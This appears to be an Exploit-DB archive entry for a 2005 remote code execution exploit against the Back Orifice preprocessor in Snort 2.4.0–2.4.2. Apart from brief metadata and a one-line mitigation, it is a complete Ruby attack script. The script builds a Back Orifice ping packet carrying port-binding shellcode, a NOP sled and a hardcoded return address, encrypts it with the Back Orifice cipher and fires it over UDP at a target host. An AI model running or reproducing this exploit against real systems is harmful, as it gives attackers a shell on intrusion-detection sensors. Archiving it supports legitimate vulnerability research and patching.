snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit

vendor:

Snort

by:

xwings

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Snort

Affected Version From: 2.4.0

Affected Version To: 2.4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:snort:snort

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2005

snort 2.4.0 – 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit

This exploit is a remote code execution vulnerability in Snort 2.4.0 - 2.4.2. It uses a pre-preprocessor to send a malicious payload to the target system. The payload contains a shellcode that binds a port and connects back to the attacker. The exploit was tested on Linux debian24 2.4.27-2-386 with gcc version 3.3.5 and Snort 2.4.2.

Mitigation:

Upgrade to the latest version of Snort and apply the latest security patches.

Source

Exploit-DB raw data:

#!/usr/bin/ruby -w

#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody need to update the page
# 
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
# 
# 03:07 <@mark> hey xwings
# 03:07 <@mark> why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
# 
# 
#

require 'socket'

fathost         = ARGV[0]
packetsize      = 1069 # ret is 1069
targetport      = 9080

boheader =      "*!*QWTY?"  +
                [1096].pack("V")  +           # Length ,thanx Russell Sanford
                "\xed\xac\xef\x0d"+           # ID
                "\x01"                        # PING

## Port Bind 3964 . connectback, refer to Russell Sanford's code

shellcode =     "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8"+
                "\x8e\x30\x01\x83\xeb\xfc\xe2\xf4\xd9\x55\x63\x42\xbb\xe4\x32\x6b"+
                "\x8e\xd6\xa9\x88\x09\x43\xb0\x97\xab\xdc\x56\x69\xe7\xf2\x56\x52"+
                "\x61\x6f\x5a\x67\xb0\xde\x61\x57\x61\x6f\xfd\x81\x58\xe8\xe1\xe2"+
                "\x25\x0e\x62\x53\xbe\xcd\xb9\xe0\x58\xe8\xfd\x81\x7b\xe4\x32\x58"+
                "\x58\xb1\xfd\x81\xa1\xf7\xc9\xb1\xe3\xdc\x58\x2e\xc7\xfd\x58\x69"+
                "\xc7\xec\x59\x6f\x61\x6d\x62\x52\x61\x6f\xfd\x81"

filler =        "\x90" * (packetsize-(boheader.length + shellcode.length))

retadd =        [0xbffff370].pack('L')

        
darthcode = (shellcode+filler+retadd)

def msrand(seed)
        @holdrand = 31337 
        end

def mrand()
        return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
        end

def bocrypt(takepayload)

        @arrpayload = (takepayload.split(//))
       
        encpayload ="".to_s
        @holdrand=0
        msrand(0)
        
        @arrpayload.each do |c|
                encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
                end
        
        return encpayload
        end

UDPSocket.open.send(bocrypt(boheader+darthcode), 0, fathost, targetport)

# milw0rm.com [2005-11-11]